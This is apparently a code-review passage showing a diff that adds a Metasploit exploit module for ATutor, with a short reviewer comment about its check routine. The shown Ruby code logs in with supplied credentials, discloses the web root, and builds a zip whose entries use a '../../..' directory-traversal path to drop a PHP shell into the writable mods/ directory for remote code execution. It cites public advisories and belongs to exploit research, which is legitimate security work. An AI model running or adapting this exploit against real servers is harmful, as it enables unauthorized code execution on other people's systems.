modules/exploits/linux/http/atutor_filemanager_traversal.rb

```diff
@@ -0,0 +1,370 @@
+        [
+          [ 'URL', 'http://www.atutor.ca/' ],                           # Official Website
+          [ 'URL', 'http://sourceincite.com/research/src-2016-09/'  ],  # Type Juggling Advisory
+          [ 'URL', 'http://sourceincite.com/research/src-2016-10/'  ],  # TOCTOU Advisory
+          [ 'URL', 'http://sourceincite.com/research/src-2016-11/'  ],  # Directory Traversal Advisory
+          [ 'URL', 'https://github.com/atutor/ATutor/pull/107' ]
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+        },
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [[ 'Automatic', { }]],
+      'DisclosureDate' => 'Mar 1 2016',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']),
+        OptString.new('USERNAME', [false, 'The username to authenticate as']),
+        OptString.new('PASSWORD', [false, 'The password to authenticate with'])
+      ],self.class)
+  end
+
+  def print_status(msg='')
+    super("#{peer} - #{msg}")
+  end
+
+  def print_error(msg='')
+    super("#{peer} - #{msg}")
+  end
+
+  def print_good(msg='')
+    super("#{peer} - #{msg}")
+  end
+
+  def check
+    # there is no real way to finger print the target so we just
+    # check if we can upload a zip and extract it into the web root...
+    # obviously not ideal, but if anyone knows better, feel free to change
+    if (not datastore['USERNAME'].blank? and not datastore['PASSWORD'].blank?)
+      student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], check=true)
+      if student_cookie != nil && disclose_web_root
+        begin
+          if upload_shell(student_cookie, check=true) && found
+            return Exploit::CheckCode::Vulnerable
+          end
+        rescue Msf::Exploit::Failed => e
+          vprint_error(e.message)
+        end
+      else
+        # if we cant login, it may still be vuln
+        return Exploit::CheckCode::Unknown
+      end
+    else
+      # if no creds are supplied, it may still be vuln
+      return Exploit::CheckCode::Unknown
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def create_zip_file(check=false)
+    zip_file      = Rex::Zip::Archive.new
+    @header       = Rex::Text.rand_text_alpha_upper(4)
+    @payload_name = Rex::Text.rand_text_alpha_lower(4)
+    @archive_name = Rex::Text.rand_text_alpha_lower(3)
+    @test_string  = Rex::Text.rand_text_alpha_lower(8)
+    # we traverse back into the webroot mods/ directory (since it will be writable)
+    path = "../../../../../../../../../../../../..#{@webroot}mods/"
+
+    # we use this to give us the best chance of success. If a webserver has htaccess override enabled
+    # we will win. If not, we may still win because these file extensions are often registered as php
+    # with the webserver, thus allowing us remote code execution.
+    if check
```

Comment:
Yeah it needs to actually check a checkcode. I'll fix it later when you're done reviewing :-)